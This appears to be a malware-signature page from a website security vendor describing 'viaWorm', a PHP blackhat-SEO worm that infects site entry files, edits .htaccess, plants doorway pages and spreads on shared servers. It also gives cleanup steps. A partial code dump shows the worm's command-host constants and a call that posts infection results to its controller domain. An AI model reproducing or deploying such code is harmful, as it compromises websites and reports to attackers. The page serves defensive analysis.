Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.viaWorm.001

php.spam-seo.viaWorm.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.

viaWorm is a complex spam infection with several functionalities implemented. It analyzes and attacks main site's entry points such as index.php, home.php, app.php and others. Adds it own rules to the site's .htaccess and includes also backdoor functionality. Except the infected files, there is also "infector" script used for infecting the site entry points, storing the configuration and functions which allows the malware author to update the script's source code. During the infection stage, it also searches and tries to infect other sites on the same server.

Another important feature implemented is a doorway generator. We have discovered following sites cooperating with these infection:

cssstyle.org
stylesheetcss.com
googlearticle.net

The doorway generator creates the following directory structure in one of the site's writable directies:

__links_sources/__pages_sources;
__links_sources/__website_config;
__links_sources/__sys_source;
__links_sources/__pages_map;
__links_sources/__links_sources;
__links_sources/__links_sources;
__links_sources/__website_source.

Inside those directories you can find doorway pages, template, link maps, etc. To make doorways publicly visible, the script makes changes to .htaccess';
$affecting='Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.';
$cleanup='Cleanup is done by deleting this doorway gen file, cleaning .htaccess file and deleting the __links_sources/ directory as well as other files belonging to this malware. Depending on the infection penetration level, there might be other malicious files and open security holes.
You can also sign up with us and let our team remove the malware for you.

Dump

/**
 * Class viaWorm
 */
class viaWorm
{
    const DADDY_HOST = 'cssstyle.org';
    const LINKS_DADDY_HOST = 'stylesheetcss.com';
...
        $query = http_build_query(array('worm_result' => serialize($result)));
        $worm_precess_url = 'http://' . viaWorm::DADDY_HOST . '/process-worm';
        viaWorm::sendPost($worm_precess_url, $query);
        echo json_encode($result);
        exit();
}